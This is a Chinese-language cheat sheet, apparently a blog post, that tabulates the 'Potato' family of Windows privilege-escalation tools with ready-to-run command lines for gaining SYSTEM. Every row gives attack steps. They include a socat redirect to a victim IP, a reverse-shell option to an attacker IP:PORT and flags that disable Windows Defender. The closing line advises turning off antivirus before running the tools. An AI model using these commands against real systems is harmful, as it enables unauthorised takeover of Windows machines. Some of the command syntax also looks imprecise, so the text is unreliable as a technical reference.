土豆家族工具使用适配表格大全【windows提权】
“土豆家族”(Potato Family)指的是Windows本地权限提升(Local Privilege Escalation)工具系列,这些工具主要利用DCOM、RPC、NTLM中继等机制,从低权限用户(如SeImpersonatePrivilege)提升至SYSTEM权限。以下表格基于可靠来源整理,涵盖主要工具的名称、发布年份、关键特性、Windows版本兼容性、使用要求/基本步骤及下载链接,供大家参考。
工具名称 | 发布年份 | 关键特性 | Windows 兼容性 | 使用要求/基本步骤 | 下载链接 |
---|---|---|---|---|---|
Hot Potato | 2016 | NTLM 中继(HTTP->SMB)和 NBNS 欺骗,利用 WPAD 代理服务器创建高权限进程。 | Windows 7/8/10, Server 2008/2012 (部分 1809+ 需测试) | 要求:SeImpersonatePrivilege。 步骤:1. 下载二进制;2. Potato.exe -ip -cmd "cmd.exe" -disable_exhaust true -disable_defender true 。 | GitHub |
RottenPotato | 2016 | DCOM 触发,利用 BITS CLSID 和固定端口 6666 进行 MITM NTLM 交换,窃取 SYSTEM 令牌。 | < Windows 10 1809 / Server 2019 | 要求:Meterpreter shell + Incognito 模式。 步骤:1. 下载;2. MSFRottenPotato.exe t "c:\windows\temp\test.bat" 。 | GitHub |
RottenPotatoNG | 2017 | RottenPotato 的 C++ 重实现,无需 Meterpreter,直接生成特权进程。 | < Windows 10 1809 / Server 2019 | 要求:SeImpersonatePrivilege。 步骤:1. 下载 DLL/EXE;2. 注入或运行 RottenPotatoNG.exe -cmd "cmd.exe" 。 | GitHub |
JuicyPotato | 2017 | RottenPotatoNG 增强版,使用多个 CLSID(非固定 BITS),灵活创建进程,支持 x64。 | < Windows 10 1809 / Server 2019 (x64 版兼容 11 部分场景) | 要求:SeImpersonatePrivilege。 步骤:1. 下载;2. juicypotato.exe -l 1337 -p "cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 。 | GitHub |
LonelyPotato | 2018 | DCOM 滥用,类似 Rotten 但针对特定场景,直接 API 模拟,无需 Meterpreter。 | Windows 7-10 (已弃用,推荐 JuicyPotato) | 要求:基本 DCOM 权限。 步骤:1. 下载;2. 运行 LonelyPotato.exe -cmd "cmd.exe" (简单注入)。 | GitHub |
RoguePotato | 2019 | RPC over 自定义端口,利用 socat 重定向和命名管道窃取令牌。 | >= Windows 10 1809 / Server 2019 | 要求:控制端口 135 访问。 步骤:1. socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 ;2. RoguePotato.exe -r YOUR_IP -e "cmd.exe" -l 9999 。 | GitHub |
SweetPotato | 2020 | 多模式集合(DCOM/WinRM/EfsRpc/PrintSpoofer),集成多种 Potato 技术,自动化选择。 | Windows 7+(视模式而定,2025 测试兼容 11) | 要求:SeImpersonatePrivilege。 步骤:1. 下载;2. SweetPotato.exe -m dcom -c "cmd.exe" (DCOM 模式示例)。 | GitHub |
GenericPotato | 2021 | HTTP/命名管道模拟认证,适用于 Print 服务未运行或 BITS 禁用场景,支持 WinRM。 | Windows 10+ (兼容 Server 2022) | 要求:SeImpersonatePrivilege,WinRM 运行。 步骤:1. 下载;2. GenericPotato.exe -m http -p "cmd.exe" -l 8080 。 | GitHub |
JuicyPotatoNG | 2022 | JuicyPotato 的下一代版,优化 DCOM 滥用,支持 CreateProcessWithTokenW/AsUser 进程创建,CLSID 暴力破解模式。 | >= Windows 10 1803 / Server 2019 (兼容 11/Server 2022,防火墙绕过) | 要求:SeImpersonatePrivilege。 步骤:1. 下载;2. JuicyPotatoNG.exe -t * -p "cmd.exe" -l 1337 -c {854A20FB-2D44-457D-992F-EF13785D2B51} (* 为自动尝试类型)。 | GitHub |
GodPotato | 2023 | 高级 DCOM 滥用,支持几乎所有版本,结合令牌窃取和进程注入,使用内置 CLSID。 | Windows 7+(几乎全兼容,包括 11/2022) | 要求:SeImpersonatePrivilege。 步骤:1. 下载;2. GodPotato.exe -cmd "cmd.exe" -user "NT AUTHORITY\SYSTEM" 。 | GitHub |
LocalPotato | 2023 | 本地 DCOM 强制 SYSTEM 认证,针对 SMB/HTTP 服务器写任意文件,利用 NTLM 挑战。 | Windows 10+(CVE-2023-21746 后仍部分有效) | 要求:SeImpersonatePrivilege。 步骤:1. 下载;2. LocalPotato.exe -cmd "cmd.exe" -spn "cifs/127.0.0.1" 。 | GitHub |
DeadPotato | 2024 | GodPotato 自定义版,扩展模块(cmd/rev/exe/newadmin/shell/mimi/defender/sharphound),利用 DCOM RPCSS OXID 缺陷。 | Windows 10+(2025 测试兼容 11/Server 2022) | 要求:SeImpersonatePrivilege(用 whoami /priv 验证)。步骤:1. 下载;2. deadpotato.exe -cmd "whoami" 或 -rev IP:PORT 。 | GitHub |
通用要求:大多数工具需SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege;运行前禁用AV/Defender可能必要。